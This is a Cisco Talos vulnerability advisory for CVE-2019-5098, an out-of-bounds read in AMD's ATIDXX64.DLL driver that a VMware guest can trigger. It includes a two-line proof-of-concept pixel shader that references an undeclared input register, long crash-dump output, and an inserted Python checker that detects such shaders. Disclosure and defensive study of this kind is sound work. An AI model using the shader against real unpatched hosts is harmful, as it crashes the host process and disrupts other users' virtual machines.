CVE-2019-5098
An exploitable out-of-bounds read vulnerability exists in the AMD ATIDXX64.DLL driver, version 26.20.13001.29010. A specially crafted pixel shader can cause an out-of-bounds memory read. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting the VMware host.
Tested versions:
AMD ATIDXX64.DLL (26.20.13001.29010) running on Radeon RX 550 / 550 Series
VMware Workstation 15 (15.1.0 build-13591040) with Windows 10 x64 as guest VM
Product URLs:
http://amd.com
http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-125: Out-of-bounds Read
This vulnerability can be triggered by supplying a malformed pixel shader inside a VMware guest OS. Such an attack can be launched from VMware guest user mode to cause an out-of-bounds memory read in the vmware-vmx.exe process on the host, or theoretically through WebGL (a remote website).
By modifying a shader instruction operand (in this case the operand of the SINCOS instruction) to reference a previously undeclared input register (in this case V4, since only V0 is declared by DCL_INPUT_PS_SIV), it is possible to cause an out-of-bounds read.
Sample shader:
dcl_input_ps_siv constant v0.xyzw, position ; Declares a shader-input register (v0)
sincos r6.x, null, v4.xxxx ; Component-wise sin(theta) and cos(theta) for theta in radians.
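As an added illustration, not code from the advisory or from AMD's driver, the following Python checker performs the declaration check that the shader compiler evidently skips: it reads shader-model assembly text, records the input registers declared by dcl_input* instructions, and reports any later instruction that references an undeclared v-register. The shader text is the advisory's sample, embedded as a constructed string; the simplified operand syntax (plain vN with an optional swizzle) is an assumption.

```python
import re

# Constructed sample: the advisory's shader, which uses v4 although only v0 is declared.
SAMPLE_SHADER = """\
dcl_input_ps_siv constant v0.xyzw, position ; Declares a shader-input register (v0)
sincos r6.x, null, v4.xxxx ; Component-wise sin(theta) and cos(theta)
"""

# Any dcl_input* opcode (dcl_input, dcl_input_ps, dcl_input_ps_siv, ...) declares input registers.
DECL_RE = re.compile(r"^dcl_input\w*$")
# Input register operand: vN with an optional swizzle such as .xyzw (assumed simplified syntax).
INPUT_REG_RE = re.compile(r"\bv(\d+)(?:\.[xyzw]{1,4})?\b")


def strip_comment(line):
    """Drop a trailing ';' comment and surrounding whitespace."""
    return line.split(";", 1)[0].strip()


def check_input_registers(asm_text):
    """Return [(line_no, 'vN'), ...] for every use of an input register
    that no earlier dcl_input* instruction declared."""
    declared = set()
    findings = []
    for line_no, raw in enumerate(asm_text.splitlines(), 1):
        line = strip_comment(raw)
        if not line:
            continue
        opcode, _, operands = line.partition(" ")
        regs = {int(m.group(1)) for m in INPUT_REG_RE.finditer(operands)}
        if DECL_RE.match(opcode):
            declared |= regs          # declaration: remember these registers
            continue
        for reg in sorted(regs - declared):
            findings.append((line_no, f"v{reg}"))  # use before declaration
    return findings


if __name__ == "__main__":
    for line_no, reg in check_input_registers(SAMPLE_SHADER):
        print(f"line {line_no}: input register {reg} used but never declared")
```

A driver-side compiler would apply the same rule before indexing its input-register table, rejecting the shader instead of dereferencing an index derived from the missing entry.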
Debugger output:
00007FFC379F8EDA | 8B 83 A4 00 00 00 | mov eax,dword ptr ds:[rbx+A4] |
00007FFC379F8EE0 | 48 8B 7B 20 | mov rdi,qword ptr ds:[rbx+20] |
00007FFC379F8EE4 | 44 8B 74 84 30 | mov r14d,dword ptr ss:[rsp+rax*4+30] | * rax=-1
The rax register does not seem to be easily controllable, so this issue only leads to crashing the vmware-vmx.exe process.
0:016> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for amdihk64.dll
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Analysis.CPU.Sec
Value: 3
Key : Analysis.Elapsed.Sec
Value: 34
Key : Analysis.Memory.CommitPeak.Mb
Value: 160
Key : Timeline.Process.Start.DeltaSec
Value: 193
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2019-08-25T13:26:28.621Z
Diff: 283762621 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2019-08-22T06:37:06.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2019-08-22T06:33:53.0Z
Diff: 193000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 400
MODLIST_WITH_TSCHKSUM_HASH: 13437b918b50e558b56f50c6a54bf0d11143a633
MODLIST_SHA1_HASH: 79ac638f549732d19dbe903080e0744bb873a97d
APPLICATION_VERIFIER_FLAGS: 0
DUMP_FLAGS: 12
DUMP_TYPE: 1
CONTEXT: (.ecxr)
rax=000001f9a5531ad8 rbx=00007fff53900000 rcx=00000000ffffffff
rdx=000001f9a5531ab8 rsi=0000000000000006 rdi=000001f9a5530098
rip=00007fff53d18a0d rsp=00000071801f8e20 rbp=0000000000440006
r8=0000000000000004 r9=00007fff5425fed4 r10=0000000000000001
r11=000001f9a57aa964 r12=000001f9a5530000 r13=0000000000000000
r14=0000000000000000 r15=000001f9a55311a0
iopl=0 nv up ei ng nz ac po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3ae74d:
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8] ds:00000201`a5531ad0=????????????????
Resetting default scope
FAULTING_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007fff53d18a0d (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003ae74d)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000201a5531ad0
Attempt to read from address 00000201a5531ad0
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: vmware-vmx.exe
FOLLOWUP_IP:
atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
00007fff`53d18a0d 488b14c8 mov rdx,qword ptr [rax+rcx*8]
READ_ADDRESS: 00000201a5531ad0
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000201a5531ad0
WATSON_BKT_PROCSTAMP: 5cce82c7
WATSON_BKT_PROCVER: 15.1.0.46741
PROCESS_VER_PRODUCT: VMware Workstation
WATSON_BKT_MODULE: atidxx64.dll
WATSON_BKT_MODSTAMP: 5d4cabd4
WATSON_BKT_MODOFFSET: 418a0d
WATSON_BKT_MODVER: 26.20.13001.29010
MODULE_VER_PRODUCT: Advanced Micro Devices, Inc. Radeon DirectX 11 Driver
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 08-25-2019 15:26:28.0621
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x3268]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
ID: [0n285]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x3268]
Frame: [0] : atidxx64!AmdDxGsaFreeCompiledShader
LAST_CONTROL_TRANSFER: from 00007fff53cdd1c4 to 00007fff53d18a0d
STACK_TEXT:
00000071`801f8e20 00007fff`53cdd1c4 : 000001f9`a5530000 00000000`00000000 000001f9`00000000 000001f9`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3ae74d
00000071`801f8f00 00007fff`53a763e6 : 000001f9`a5530098 000001f8`11e56700 000001f9`a553bf00 000001f8`11e56701 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f04
00000071`801f9170 00007fff`53a666a0 : 000001f8`11f29560 000001f9`a554edf8 00000000`00000004 000001f8`11f29560 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c126
00000071`801f9330 00007fff`53a458f4 : 000001f8`11f29560 000001f8`11edeea0 00000071`801f9b70 000001f8`11f29560 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc3e0
00000071`801f93b0 00007fff`53989334 : 00000000`00000001 00000071`801f9b70 000001f8`11edeea0 00000071`801f9b70 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb634
00000071`801f9930 00007fff`5410e4e8 : 00000000`00000000 00000071`801f9a60 00000071`801f9b70 000001f9`981fad10 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f074
00000071`801f9960 00007fff`540f3c1b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a4228
00000071`801f9ad0 00007fff`540f3752 : 00000000`00000000 000001f8`11edeba0 000001f9`981dea80 00000071`801fd7e0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78995b
00000071`801f9b30 00007fff`54124173 : 000001f8`11edeba0 00000000`00000000 000001f9`981d5000 00000071`801fd7e0 : atidxx64!AmdDxGsaFreeCompiledShader+0x789492
00000071`801fd790 00007fff`540f3627 : 00000000`00000040 000001f8`11f28800 000001f9`981e2490 000001f9`981e9c10 : atidxx64!AmdDxGsaFreeCompiledShader+0x7b9eb3
00000071`801fd7c0 00007fff`541c3041 : 00000000`00000000 00000071`801fdaf0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x789367
00000071`801fd820 00007fff`53984cba : 00000000`00000000 00000000`00000000 00000071`801fdaf0 00007fff`c5e9833d : atidxx64!AmdDxGsaFreeCompiledShader+0x858d81
00000071`801fd860 00007fff`53984b03 : 000001f9`981b36e0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000071`801fd8a0 00007fff`5390c05e : 00000000`00000001 00000000`00000000 000001f8`102ec0d0 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000071`801fd930 00007fff`54077e26 : 00000000`00000000 00000071`801fdaf0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000071`801fd970 00007fff`5391d8b1 : 000001f9`9dbb0508 000001f9`9dac4efc 000001f9`975f4b00 00007fff`c0426933 : atidxx64!AmdDxGsaFreeCompiledShader+0x70db66
00000071`801fdad0 00007fff`c0408ecc : 00000000`00000000 00000071`801fdcf0 000001f9`9dbb04f8 00007fff`c5ebb9a7 : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000071`801fdbf0 00007fff`c041279f : 00000071`00000001 000001f9`975f0f18 000001f9`9dbb04f8 000001f9`975e7000 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000071`801fde50 00007fff`c04126da : 00000071`801fe530 00007fff`c05c23c8 000001f9`9dbb03b0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000071`801fdee0 00007fff`c03fee48 : 000001f9`9dbb03e8 00000071`801fe530 00000071`801fe560 00007fff`c05c23c8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000071`801fdf40 00007fff`c040b16d : 000001f8`00000000 000001f9`9dbb03b0 00000000`00000000 000001f8`0e990000 : d3d11!CDevice::CreateLayeredChild+0xc88
00000071`801fe380 00007fff`c040b940 : 000001f9`9dbb03b0 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000071`801fe4f0 00007fff`c03f14f4 : 000001f8`116d3730 00000000`00000009 000001f9`9dac4e60 000001f8`116d3f68 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000071`801fe6e0 00007fff`c03f1463 : 000001f9`9dac4e60 00000000`0000b000 00000071`801fe9c9 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000071`801fe740 00007fff`c03f11e8 : 000001f8`116d3f68 000001f9`9dac4e60 00000000`00000b54 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000071`801fe8f0 00007ff6`ae368af2 : 000001f9`a7b00160 00007ff6`ae0b0000 000001f8`116d3f68 000001f9`9e0c4520 : d3d11!CDevice::CreatePixelShader+0x28
00000071`801fe940 00007ff6`ae36a3d5 : 000001f9`a7b00160 00007ff6`ae0b0000 00007ff6`ae0b0000 000001f9`97fc0cc0 : vmware_vmx+0x2b8af2
00000071`801fea30 00007ff6`ae369252 : 000001f9`a7b080e0 00007ff6`ae0b0000 000001f9`a7b00160 000001f9`a7b00160 : vmware_vmx+0x2ba3d5
00000071`801ffa80 00007ff6`ae365741 : 00000000`fffe4000 000001f9`a7b00160 00000000`00000003 000001f9`9e370160 : vmware_vmx+0x2b9252
00000071`801ffad0 00007ff6`ae2c1af9 : 00007ff6`ae2c1a30 000001f9`9e370150 00000000`00000028 00007ff6`ae3a4120 : vmware_vmx+0x2b5741
00000071`801ffb10 00007ff6`ae252ad2 : 00000000`00000020 00007ff6`ae2c1a30 00000071`801ffc70 00000000`00000028 : vmware_vmx+0x211af9
00000071`801ffb70 00007ff6`ae250b9f : 00000071`801ffd90 00000000`00000020 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a2ad2
00000071`801ffd30 00007ff6`ae1a65c0 : 00000000`00000000 000001f8`10fb06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0b9f
00000071`801ffd60 00007ff6`ae6cc800 : 00007ff6`ae1a64a0 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65c0
00000071`801ffdb0 00007fff`c4c77bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c800
00000071`801ffe40 00007fff`c5eece71 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
00000071`801ffe70 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 3fa94a1f85e4f43faa127ed96cd9d3a8a7f2e6dc
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 63d3ad5da187eccdbf6cfaca1763fe0d4d5b2789
THREAD_SHA1_HASH_MOD: 4aa76dab8657f0bc99ca0a6f86ebd46f8e0744d8
FAULT_INSTR_CODE: c8148b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5d4cabd4
STACK_COMMAND: ~16s ; .ecxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3ae74d
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: atidxx64.dll
BUCKET_ID_IMAGE_STR: atidxx64.dll
FAILURE_MODULE_NAME: atidxx64
BUCKET_ID_MODULE_STR: atidxx64
FAILURE_FUNCTION_NAME: AmdDxGsaFreeCompiledShader
BUCKET_ID_FUNCTION_STR: AmdDxGsaFreeCompiledShader
BUCKET_ID_OFFSET: 3ae74d
BUCKET_ID_MODTIMEDATESTAMP: 5d4cabd4
BUCKET_ID_MODCHECKSUM: 1acdd90
BUCKET_ID_MODVER_STR: 26.20.13001.29010
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: atidxx64.dll!AmdDxGsaFreeCompiledShader
TARGET_TIME: 2019-08-22T06:37:06.000Z
OSBUILD: 18362
OSSERVICEPACK: 86
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 256
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 8750
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader
FAILURE_ID_HASH: {08b458dc-1323-2abb-9f1a-d0ac543a793c}
Followup: MachineOwner
---------
2019-09-03 - Vendor disclosure
2019-11-08 - Vendor patched
2019-12-04 - Vendor updated release notes
2019-12-05 - Public release
Discovered by Piotr Bania of Cisco Talos.